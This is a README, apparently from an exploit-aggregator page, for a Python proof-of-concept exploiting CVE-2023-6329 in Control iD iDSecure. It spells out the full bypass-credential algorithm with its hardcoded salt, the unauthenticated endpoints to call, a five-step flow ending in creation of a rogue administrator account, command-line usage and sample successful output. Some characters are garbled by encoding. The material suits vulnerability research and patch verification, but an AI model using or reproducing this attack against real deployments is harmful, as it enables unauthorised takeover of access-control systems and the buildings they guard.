## https://sploitus.com/exploit?id=E5A3FCA5-B614-52B4-BE82-FA62E0E99B16
# CVE-2023-6329 โ Control iD iDSecure Authentication Bypass




A Python proof-of-concept exploit for **CVE-2023-6329**, an improper access control vulnerability in Control iD iDSecure versions **4.7.43.0 and below**. The flaw allows an unauthenticated remote attacker to reconstruct valid login credentials by exploiting a predictable password derivation algorithm that relies entirely on publicly accessible values โ a device serial number, a server-provided nonce, and a hardcoded salt. Once authenticated, the attacker can create a new administrative user on the web interface.
Converted to Python based on the original Metasploit module by Michael Heinzl. Original vulnerability discovered and disclosed by [Tenable](https://www.tenable.com/security/research/tra-2023-36).
> **Disclaimer:** This tool is provided for educational purposes and authorised security testing only. The author takes no responsibility for misuse. Only run this against systems you own or have explicit written permission to test.
---
## Table of Contents
- [Vulnerability Details](#vulnerability-details)
- [How It Works](#how-it-works)
- [Requirements](#requirements)
- [Installation](#installation)
- [Usage](#usage)
- [Example Output](#example-output)
- [References](#references)
---
## Vulnerability Details
| Field | Details |
|---|---|
| **CVE ID** | CVE-2023-6329 |
| **Affected Product** | Control iD iDSecure |
| **Affected Versions** | โค 4.7.43.0 |
| **Vulnerability Type** | Improper Access Control (CWE-284) |
| **Attack Vector** | Network (unauthenticated) |
| **Disclosure Date** | November 27, 2023 |
| **Discovered By** | Tenable |
### Root Cause
The login routine in `iDS-Core.dll` exposes an alternative authentication path via a `passwordCustom` parameter. The value for this parameter is derived using a predictable algorithm that takes the device's serial number (publicly retrievable without authentication) combined with a caller-supplied nonce and a **hardcoded salt string** (`cid2016`). Since every ingredient in the computation is either attacker-controlled or freely obtainable, any remote attacker can compute a valid `passwordCustom` value and log in as an administrator.
Upon successful authentication via this path, the server resets the `admin` account password to `admin`, or creates that account if it does not already exist.
---
## How It Works
The exploit follows five steps:
**1. Version check** โ The `/api/util/configUI` endpoint returns a `401` response containing the software version, confirming whether the target is running a vulnerable build.
**2. Retrieve unlock data** โ A `GET` request to `/api/login/unlockGetData` returns the device's `serial` number and a `passwordRandom` nonce. This endpoint requires no authentication.
**3. Compute `passwordCustom`** โ The following algorithm is applied to derive the bypass credential:
```
sha1_hash = SHA1(serial)
combined = sha1_hash + passwordRandom + "cid2016"
sha256_hash = SHA256(combined)
passwordCustom = int(sha256_hash[0:6], 16) # first 6 hex chars โ decimal
```
**4. Authenticate and obtain a JWT** โ The computed `passwordCustom` and `passwordRandom` are `POST`ed to `/api/login/`, which returns a valid JWT `accessToken` with admin privileges.
**5. Create a new admin user** โ The JWT is used to `POST` to `/api/operator/` and register a new operator account with `idType: 1` (administrator role).
---
## Requirements
- Python 3.8 or higher
- `requests` library
---
## Installation
```bash
git clone https://github.com/yourhandle/CVE-2023-6329-iDSecure-AuthBypass.git
cd CVE-2023-6329-iDSecure-AuthBypass
pip install requests
```
---
## Usage
```
python3 exploit.py --host [options]
```
| Argument | Default | Description |
|---|---|---|
| `--host` | *(required)* | Target IP address or hostname |
| `--port` | `30443` | Target port |
| `--username` | `pwned_admin` | Username for the new admin account |
| `--password` | `Pwned1234!` | Password for the new admin account |
| `--no-ssl` | `False` | Disable HTTPS (use plain HTTP) |
### Examples
Basic usage against a target on the default port:
```bash
python3 exploit.py --host 192.168.1.100
```
Specify custom credentials for the new admin account:
```bash
python3 exploit.py --host 192.168.1.100 --username ctfadmin --password S3cr3tPass!
```
Target running on a non-standard port without SSL:
```bash
python3 exploit.py --host 192.168.1.100 --port 8080 --no-ssl
```
---
## Example Output
```
[*] Target: https://192.168.1.100:30443
============================================================
[*] Target version: 4.7.32.0
[+] Target appears VULNERABLE.
[+] passwordRandom : 2948271034
[+] serial : ABC123XYZ
[*] Computed passwordCustom: 8301745
[+] JWT: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
[+] User 'ctfadmin' created successfully.
[+] Verified! New credentials work.
[+] Login at: https://192.168.1.100:30443/#/login
Username : ctfadmin
Password : S3cr3tPass!
```
---
## References
- [Tenable TRA-2023-36 โ Original Advisory](https://www.tenable.com/security/research/tra-2023-36)
- [NVD โ CVE-2023-6329](https://nvd.nist.gov/vuln/detail/CVE-2023-6329)
- [Metasploit Module โ auxiliary/admin/http/idsecure_auth_bypass](https://www.rapid7.com/db/modules/auxiliary/admin/http/idsecure_auth_bypass/)